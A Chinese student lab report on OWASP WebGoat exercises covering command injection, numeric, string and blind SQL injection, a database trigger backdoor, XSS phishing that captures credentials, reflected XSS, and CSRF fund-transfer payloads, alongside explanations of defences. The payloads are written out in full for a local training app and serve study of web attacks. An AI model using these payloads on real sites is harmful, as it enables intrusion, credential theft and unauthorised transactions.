2019-2020-2 20175316 盛茂淞 《网络对抗技术》 Exp9 Web安全基础
一.实践原理与说明
实践内容概述
-
任务一:WebGoat
-
任务二:SQL注入攻击(Injection Flaws)
- 命令注入(Command Injection)
- 数字型注入(Numeric SQL Injection)
- 日志欺骗(Log Spoofing)
- SQL 注入(LAB: SQL Injection)
- Stage 1:字符串型注入(Stage 1: String SQL Injection)
- Stage 3: 数字型 SQL 注入(Stage 3: Numeric SQL Injection)
- 数据库后门(Database Backdoors)
- 数字型盲注入(Blind Numeric SQL Injection)
- 字符串型盲注入(Blind String SQL Injection)
-
任务三:XSS攻击
- XSS 钓鱼(Phishing with XSS)
- 存储型XSS攻击(Stored XSS Attacks)
- 反射型XSS攻击(Reflected XSS Attacks)
-
任务四:CSRF攻击
- 跨站请求伪造(Cross Site Request Forgery (CSRF))
- 绕过 CSRF 确认( CSRF Prompt By‐Pass)
- XSS提升:CSRF Prompt By-Pass
- CSRF令牌攻击:CSRF Token By-Pass
基础问题回答
1.SQL注入攻击原理,如何防御
- SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统
- 如何防御
- 检查变量数据类型和格式
- 过滤特殊符号
- 绑定变量,使用预编译语句
2.XSS攻击的原理,如何防御
- XSS攻击是Web攻击中最常见的攻击方法之一,它是通过对网页注入可执行代码且成功地被浏览器执行,达到攻击的目的,形成了一次有效XSS攻击,一旦攻击成功,它可以获取用户的联系人列表,然后向联系人发送虚假诈骗信息,可以删除用户的日志等等,有时候还和其他攻击方式同时实施比如SQL注入攻击服务器和数据库、Click劫持、相对链接劫持等实施钓鱼,它带来的危害是巨 大的,是web安全的头号大敌
- 攻击的条件
- 需要向web页面注入恶意代码
- 这些恶意代码能够被浏览器成功的执行
- 攻击类型
- XSS反射型攻击,恶意代码并没有保存在目标网站,通过引诱用户点击一个链接到目标网站的恶意链接来实施攻击的
- XSS存储型攻击,恶意代码被保存到目标网站的服务器中,这种攻击具有较强的稳定性和持久性,比较常见场景是在博客,论坛等社交网站上,但OA系统,和CRM系统上也能看到它身影,比如:某CRM系统的客户投诉功能上存在XSS存储型漏洞,黑客提交了恶意攻击代码,当系统管理员查看投诉信息时恶意代码执行,窃取了客户的资料,然而管理员毫不知情,这就是典型的XSS存储型攻击
- 如何防御
- 在表单提交或者url参数传递前,对需要的参数进行过滤
- 过滤用户输入的 检查用户输入的内容中是否有非法内容。如
< >(尖括号)
、”(引号)
、‘(单引号)
、%(百分比符号)
、;(分号)
、()(括号)
、&(& 符号)
、+(加号)
等等
3.CSRF攻击原理,如何防御
- (Cross Site Request Forgery, 跨站域请求伪造)是一种网络的攻击方式,它在 2007 年曾被列为互联网 20 大安全隐患之一,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用也就是人们所知道的钓鱼网站。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,并且攻击方式几乎相左。XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性
- 如何防御
- 验证 HTTP Referer 字段
- 在请求地址中添加 token 并验证
- 在 HTTP 头中自定义属性并验证
二.实验过程
任务一:WebGoat
-
Webgoat是OWASP组织研究出的一个专门进行web漏洞实验的应用品台,这个平台里包含了web中常见的各种漏洞,例如:跨站脚本攻击、sql注入、访问控制、隐藏字段、Cookie等;
-
下载
webgoat-container-7.0.1-war-exec.jar
文件 -
因WebGoat默认使用8080端口,所以开启前先用
netstat -tupln | grep 8080
查看端口是否被占用,如果被占用,用kill 进程号
终止占用8080端口的进程 -
在含有
webgoat-container-7.0.1-war-exec.jar
文件的目录下执行java -jar webgoat-container-7.0.1-war-exec.jar
-
出现
INFO: Starting ProtocolHandler ["http-bio-8080"]
则开启成功,可以看到占用8080端口,实验过程中不能关闭终端 -
打开浏览器输入
127.0.0.1:8080/WebGoat
,使用默认名和密码登录 -
在Webgoat中,solution是答案,hints是提示。打开界面,可以看到有一连串的课程。
每完成一项课程就会有一个小对勾
任务二:SQL注入攻击(Injection Flaws)
- SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。
1.命令注入(Command Injection)
-
右键点击页面,选择
inspect Element
审查网页元素对源代码进行修改 -
在复选框中任意一栏的代码,右键单击后,选择
Edit At Html
进行修改,添加"&&ifconfig"
-
点击
view
,可以看到执行指令后的网络端口使用情况和IP地址。攻击成功!
2.数字型注入(Numeric SQL Injection)
-
在station字段中注入特征字符,组合成新的SQL语句。如:
SELECT * FROM weather_data WHERE station = [station]
-
未进行攻击前,若选中
Columbia
,然后点击Go
,就会显示Columbia
的天气情况: -
右键点击页面,选择
inspect Element
审查网页元素对源代码进行修改 -
在选中的城市编号Value值中添加
or 1=1
-
Step4:系统执行了
SELECT * FROM weather_data WHERE station = 101 or 1=1
,显示了所有城市的天气,攻击成功!
3.日志欺骗:Log Spoofing
-
左侧功能栏选中
Injection Flaws—>Log Spoofing
,在文本框中输入用户名:smith Login Succeeded for username admin
,这样用户名后面的信息会在同一行显示,而不是在新的一行。 -
可以往该应用中注入回车(0D%)和换行符(%0A)。在username 中填入
20175316%0d%0aLogin Succeeded for username: admin
,以达到修改日志的目的: -
这种漏洞可以被攻击者利用以添加恶意脚本,脚本的返回信息管理员能够通过浏览器看到。
4.字符串注入String SQL Injection
-
字符串SQL注入攻击对任何数据库驱动的站点都构成了严重威胁。 攻击背后的方法很容易学习,所造成的损害可能从相当大的损害到整个系统的损害。 尽管存在这些风险,但Internet上数量惊人的系统仍容易受到这种形式的攻击。它不仅容易引发威胁,而且只要一点常识和前瞻性,就可以轻松地避免这种威胁。
-
基于
SELECT * FROM user_data WHERE last_name = ‘?‘
查询语句构造自己的SQL注入字符串,姓名框输入Smith‘ or 1=1--
,执行后可以看到所有人的卡号等信息:
5.数据库后门Database Backdoors
-
使用字符串SQL注入执行多个SQL语句,使用易受攻击的字段创建两个SQL语句,第一个是系统的,第二个是自己定义的。首先输入101查看现有的信息
-
可以看到现在的薪水是55000,接下来我们使用
101; update employee set salary=100000
,执行两条语句,第一条用于查看信息,后面的update则将薪水更新为100000 -
使用
101;CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email=‘20175316@hackme.com‘WHERE userid = NEW.userid
在每行插入前修改邮箱为指定邮箱:
6.数字型盲注入(Blind Numeric SQL Injection)
-
服务端页面返回的信息只有两种:帐号有效或无效。因此无法简单地查询到帐号的PIN 数值。尽管如此,我们可以利用系统后台在用的查询语句。查询语句如下:
SELECT * FROM user_data WHERE userid=accountNumber
; -
使用AND函数,输入查询语句
101 AND 1=1
,因为两个条件都成立,所以页面返回帐号有效 -
输入查询语句
101 AND 1=2
,因为第二个条件不成立,所以而页面返回帐号无效 -
针对查询语句的后半部分构造复杂语句,如:
101 AND ((SELECT pin FROM pins WHERE cc_number=‘1111222233334444‘) > 5000 )
-
如果提示无效,则pin值小于5000,使用二分法,最终得出pin的值为2364
7.字符串型盲注入(Blind String SQL Injection)
-
原理:与数字型盲注入类似,某些 SQL 注入是没有明确返回信息的,只能通过条件的“真”和“假”进行判断。攻击者必须充分利用查询语句,构造子查询语。
-
与数字型盲注入类似,只是将注入的数字换为字符串而已
-
例如:输入
101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number=‘4321432143214321‘), 1, 1) < ‘M‘ )
- 取得 pin 字段数值的第一个字母,并判断其是否比字母“M”小
- SUBSTRING 语法为 SUBSTRING(STRING,START,LENGTH)
- 同样使用二分法进行测试,最后得到pin字段为Jill
任务三:XSS攻击
- 跨站脚本攻击是通过HTML注入劫持用户的浏览器,任意构造用户当前浏览的HTML内容,可以模拟用户当前的操作。这里实验的是一种获取用户名和密码的攻击。
1.XSS 钓鱼(Phishing with XSS)
-
当用户输入非法HTTP响应时容易受到XSS攻击。在XSS的帮助下,可以实现钓鱼工具或向某些官方页面中增加内容。对于受害者来说很难发现该内容是否存在威胁。
-
将下面这段代码输入到
Search
输入框中,点击search
,结果会出现代码中所指定的绿、红、蓝三块div,并在下方出现了用于欺骗用户的提示语This feature requires account login:
和用户名、密码输入框。
<head>
<body>
<div>
<div style="float:left;height:100px;width:50%;background-color:green;"></div>
<div style="float:left;height:100px;width:50%;background-color:red;"></div>
</div>
<div style="background-color:blue;height:200px;clear:both;"></div>
</div></div>
</form>
<script>
function hack(){
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("attack.!!!!!! Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
}
</script>
<form name="phish">
<br>
<br>
<HR>
<H2>This feature requires account login:</H2>
<br>
<br>Enter Username:<br>
<input type="text" name="user">
<br>Enter Password:<br>
<input type="password" name = "pass">
<br>
<input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>
</body>
- 输入用户名和密码以后点击
login
按钮提交,可以看到反馈输入的信息:
2.存储型XSS攻击(Stored XSS Attacks)
-
输入验证是一个很好的方法,尤其是验证那些以后将用做参数的操作系统命令、脚本和数据库查询的输入。尤为重要的是,这些内容将会永久的存放在那里。应当禁止用户创建消息内容。用户的信息被检索时,可能导致其他用户加载一个不良的网页或不良的内容。当一个未经验证的用户的输入作为一个HTTP 响应时,XSS 攻击也可能会发生。在一个反射式XSS 攻击中,攻击者会利用攻击脚本精心制作一个URL 并通过将其发送到其他网站、电子邮件、或其他方式骗取受害者点击它。
-
在
title
中任意输入字符,留言板中输入
<head>
<body>
<div>
<div style="float:left;height:100px;width:50%;background-color:green;"></div>
<div style="float:left;height:100px;width:50%;background-color:red;"></div>
</div>
<div style="background-color:blue;height:200px;clear:both;"></div>
</div></div>
</form>
<script>
function hack(){
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("attack.!!!!!! Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
}
</script>
<form name="phish">
<br>
<br>
<HR>
<H2>This feature requires account login:</H2>
<br>
<br>Enter Username:<br>
<input type="text" name="user">
<br>Enter Password:<br>
<input type="password" name = "pass">
<br>
<input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>
</body>
</head>
-
点击
submit
提交,下方“Message List”
中会新增刚输入的Tile
名字的链接,点击链接可以看到我们的html已经注入成功,messege部分显示的是绿、红、蓝三色框: -
在下方用户名密码处输入,点击提交后,被成功获取用户名和密码:
3.反射型XSS攻击(Reflected XSS Attacks)
-
我们在访问一个网页的时候,在URL后面加上参数,服务器根据请求的参数值构造不同的HTML返回。value可能出现在返回的HTML(可能是JS,HTML某元素的内容或者属性)中,如果将value改成可以在浏览器中被解释执行的东西,就形成了反射型XSS。别人可能修改这个value值,然后将这个恶意的URL发送给你,当URL地址被打开时,特有的恶意代码参数就会被HTML解析执行。它的特点是非持久化,必须用户点击带有特定参数的链接才能引起。
-
在
Enter your three digit access code
框中输入代码
<script>alert("You‘ve been attacked!!! I‘m 20175316~");</script>
- 点击
purse
,成功显示警告框,内容为我们script脚本指定的内容:
任务四:CSRF攻击
- 跨站请求伪造,尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性。
1.跨站请求伪造:Cross Site Request Forgery (CSRF)
-
查看页面右侧Parameters中的src和menu值,分别为534和900
-
在title中输入任何参数,message框中输入
<img src="http://localhost:8080/WebGoat/attack?Screen=534&menu=900&transferFunds=5000" width="1" height="1" />
-
以图片的的形式将URL放进Message框,这时的URL对其他用户是不可见的,用户一旦点击图片,就会触发一个CSRF事件,点击Submit提交
- 这里src值、menu值要根据上一步查看的结果修改,转账数额随便输入,eg:5000
- 宽高设置成1像素的目的是隐藏该图片
-
提交后,在Message List中生成以Title命名的链接(消息)。点击该消息,当前页面就会下载这个消息并显示出来,转走用户的5000元,从而达到CSRF攻击的目的。
2.绕过 CSRF 确认(CSRF Prompt By‐Pass)
-
跨站点请求伪造(CSRF/XSRF)是一种攻击,它欺骗受害者加载包含“伪造请求”的页面,以便使用受害者的凭据执行命令。提示用户确认或取消命令可能听起来像一个解决方案,但如果提示符是可编写脚本的,则可以忽略它。本课展示如何通过发出另一个伪造的请求来绕过这样的提示符。这也适用于一系列提示,例如向导或发出多个不相关的伪造请求。
-
与上一个题目类似,向包含多个恶意请求的新闻组发送电子邮件:第一个请求用于转移资金,第二个请求用于确认第一个请求触发的提示符。url应该指向攻击servlet,其中包含这个CSRF-prompt-by-pass课程的屏幕、菜单参数和一个额外的参数“transferFunds”,其中包含一个数值“5000”来启动传输,一个字符串值“CONFIRM”来完成传输。您可以从右边的插图中复制课程的参数,创建格式为
attack?Screen=XXX&menu=YYY&transferFunds=ZZZ的url
。无论谁收到这封电子邮件,并且碰巧在那个时候通过了身份验证,他的资金就会被转移。 -
同上一个攻击,查看页面下侧Parameters中的src和menu值(534和900),并在title框中输入学号,message框中输入代码:
<iframe src="attack?Screen=534&menu=900&transferFunds=5000"> </iframe>
<iframe src="attack?Screen=534&menu=900&transferFunds=CONFIRM"> </iframe>
- 在Message List中生成以Title命名的链接"20175316"
- 点击进入后,如图攻击成功:
三.过程中遇到的问题及解决方法
问题一
-
登陆后的界面如下:
-
从上图可以看到左侧功能栏只有Admin Functions一项,正常的话会有很多,说明jdk没有配置
解决方法:
-
kali一般是装了1.8的,输
update-alternatives --config java
可以切换jdk版本 -
我把这个选成2,重新启动wegoat,导航栏已经有了课程选项,方便快捷
四、实践总结
- 这次的实验内容比较多,但是让我更加直观的体验到了web攻击的威力,平时只是听说这些,真正自己做的时候还是很有乐趣的